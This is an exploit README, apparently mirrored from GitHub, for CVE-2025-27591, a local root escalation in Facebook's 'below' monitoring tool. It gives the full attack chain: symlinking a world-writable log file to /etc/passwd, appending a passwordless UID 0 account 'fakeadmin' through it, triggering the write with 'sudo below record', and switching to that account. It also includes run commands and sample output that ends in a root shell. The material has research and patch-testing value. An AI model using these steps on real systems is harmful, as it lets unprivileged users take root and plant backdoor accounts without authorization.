来源

关联漏洞

描述

🔥 Local Privilege Escalation Exploit for CVE-2025-27591 | Abuses world-writable log dir in Below to gain root via /etc/passwd injection

介绍

# CVE-2025-27591 – Privilege Escalation via Symlink Abuse in `below`

[![Author](https://img.shields.io/badge/author-00xCanelo-blue)](https://github.com/00xCanelo)
[![CVE](https://img.shields.io/badge/CVE-2025--27591-critical-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591)

> 🛑 **Disclaimer**: This exploit is provided **for educational and authorized security testing only**. Unauthorized use may be illegal.

---

## 🧠 Overview

`below` is a performance monitoring tool developed by Facebook for Linux systems. Versions of `below` prior to a patched release are affected by a critical vulnerability that allows **unprivileged users** to escalate to **root** by exploiting **world-writable log directories** and unsanitized log handling.

---

### 🔎 CVE Details

| Field            | Value                                          |
|------------------|------------------------------------------------|
| **CVE-ID**       | [CVE-2025-27591](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27591) |
| **Severity**     | 🔥 Critical (CVSS ≈ 7.8 - 8.8)                 |
| **Attack Vector**| Local                                          |
| **Impact**       | Privilege Escalation to root (UID=0)           |
| **Exploit Type** | Symlink Abuse / Log File Injection             |
| **Affected App** | `below` – typically installed as `/usr/bin/below` |
| **Root Cause**   | Unsafe file writes to `/var/log/below/` without permission checks |

---

## 💥 Exploit Logic

This Bash script performs the following:

1. **Check for World-Writable Directory**:
   - Confirms if `/var/log/below` is world-writable (a red flag).

2. **Prepare Symlink Attack**:
   - Deletes existing `error_root.log` (if any) and creates a symbolic link to `/etc/passwd`.

3. **Payload Construction**:
   - Appends a fake root user to `/etc/passwd`:  
     ```
     fakeadmin::0:0:fakeadmin:/root:/bin/bash
     ```

4. **Trigger Logging**:
   - Runs `sudo below record` to force the vulnerable binary to write logs.

5. **Gain Root Access**:
   - Uses `su fakeadmin` to obtain a root shell with no password prompt.

---

## 📁 Directory Structure

```text
CVE-2025-27591/
├── exploit.sh
├── README.md
```
## ✅ Prerequisites

Before running the exploit, ensure you have the following:

- Bash shell (Linux system)
- The vulnerable binary installed: `/usr/bin/below`
- World-writable log directory: `/var/log/below`
- `sudo` privileges to execute: `sudo below record`
- Tools available:
  - `ln` (to create symlinks)
  - `su` (to switch users)
  - `timeout` (to control execution time)
  - `whoami` (for privilege check)

---

## 🚀 Exploitation Steps

```bash
# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. Make the script executable
chmod +x exploit.sh

# 3. Execute the exploit
./exploit.sh
```
## 🧪 Sample Output

```bash
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd

[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)

[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.

[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root

文件快照

 [4.0K]  /data/pocs/46e0f51d28472c8cc1b33c7df0f8c19784bf30bc
├── [2.4K]  exploit.sh
└── [3.4K]  README.md

0 directories, 2 files

备注